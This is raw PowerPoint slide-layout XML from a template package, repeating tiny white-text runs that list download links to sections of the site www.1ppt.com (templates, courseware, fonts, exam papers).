              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout285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85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85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85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8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86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8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8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8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9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9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9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9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9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9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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout29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9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9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29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30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30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30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30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30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30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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout30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30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30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30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31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31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31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31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31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31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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
